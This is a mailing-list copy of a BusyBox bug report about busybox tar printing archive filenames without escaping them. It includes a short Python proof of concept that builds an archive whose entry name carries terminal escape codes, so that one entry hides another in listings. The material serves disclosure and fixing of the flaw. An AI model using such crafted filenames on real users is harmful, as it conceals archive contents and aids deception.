[Bug 16018] busybox tar allows un-escaped filenames to be printed to stdout/stderr

bugzilla at busybox.net bugzilla at busybox.net
Wed Jun 19 21:56:16 UTC 2024


https://bugs.busybox.net/show_bug.cgi?id=16018

--- Comment #2 from Ian Norton <ian.norton at entrust.com> ---
The following python program demonstrates creating an archive with an entry
that can hide one or more previous entries from the list and verbose extract
output:

#!/usr/bin/env python3
import tarfile

with tarfile.open("bad.tar", "w") as tf:
    tf.add(__file__, arcname="hidden.txt")
    tf.add(__file__, arcname="\033[1A\033[1Ka-totally-innocent-filename.txt")

-- 
You are receiving this mail because:
You are on the CC list for the bug.


More information about the busybox-cvs mailing list